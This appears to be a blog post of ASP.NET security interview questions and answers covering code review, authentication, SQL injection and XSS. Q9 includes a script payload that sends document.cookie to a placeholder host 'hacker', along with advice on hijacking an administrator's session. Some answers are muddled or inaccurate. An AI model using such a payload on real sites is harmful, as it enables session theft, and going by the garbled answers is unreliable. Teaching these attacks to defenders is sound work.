ASP.NET Security Impersonation Interview Question and Answers for 5 years Experienced

Asp.net Security Interview Questions and Answers for 3-5 experienced.
Latest Asp.net Security Interview Questions with Answers.
Hi friends here I come with Asp.net Security related questions for experienced developers. This set contain 10 questions related to Asp.net security. 
So lets start

ASP.NET SECURITY INTERVIEW QUESTIONS SET-1

Q 1:- What you will do for make your code more secure?
Ans:- I will review my code from beginning and understand the security issues that are possible in the code, after that i will resolve them.

Q 2:- How much time you will set for review, is there any time limit, if you not getting security issues?
Ans:- I will set reasonable time limit on my review, and then optimize my review for this limit. If I find myself spending too much time in any one area (especially if it is not a high-priority area or objective),then I flag it for later review and move on.

Q 3:- What you will do if you have not much time for (asp.net project) security review?
Ans:- I will limit my reviews to small, manageable pieces of code. This allows me to finish quickly, stay focused, and find a larger number of security issues in the code me examining.

Q 4:- What is the difference between Authentication and Authorization?
Ans:- Authentication means validating users. In this step, we verify user credentials to check whether the person tying to log in is the right one or not. 
Authorization on the other hand is keeping track of what the current user is allowed to see and what should be hidden from him.

Q 5:- What do you understand by SQL Injection attack?
Ans:- A SQL injection attack occurs when untrusted input can modify the logic of a SQL query in unexpected ways.

Q 6:- What you will do to prevent SQL injection?
Ans:- I will use parameterized and typed stored procedures.
The typed SQL parameter checks the type and length of the input, and it ensures that the userName input value is treated as a literal value and not as executable code in the database.

Q 7:- If you are not using Stored Procedure, think you are using simple sql statment then what you will do to prevent SQL injections?
Ans:- If the code does not use stored procedures, make sure that it uses parameters in the SQL statements it constructs, as shown in the following example.
select status from Users where UserName=@userName
I will check that the code does not use the following approach, where the input is used directly to construct the executable SQL statement by using string concatenation.
string sql = "select status from Users where UserName='"
+ txtUserName.Text + "'";

Q 8:- What do you understand by XSS?
Ans:- Cross-site scripting (also known as XSS or CSS) 

Q 9:- What is Cross-site scripting (XSS)?
Ans:- Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. 

Example 1.
For example, the HTML snippet:
<title>Example document: %(title)</title>

is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
<SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
Sitting on the other end, at the Webserver, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their sessionID and hijack the session.

Q 10:- What is the difference between Windows and Forums Authentication?
Ans:- Windows Authentication: is provided so that web pages
can make use of the local Windows User and Groups.In it windows actual login name and
password is used for authentication.

Forms Authentication: Under Forms Authentication user can able to create their own
login name and password it is basically a cookie based
authentication system which stores the login name and
password in database file.

Comments

Archive

Contact Form

Send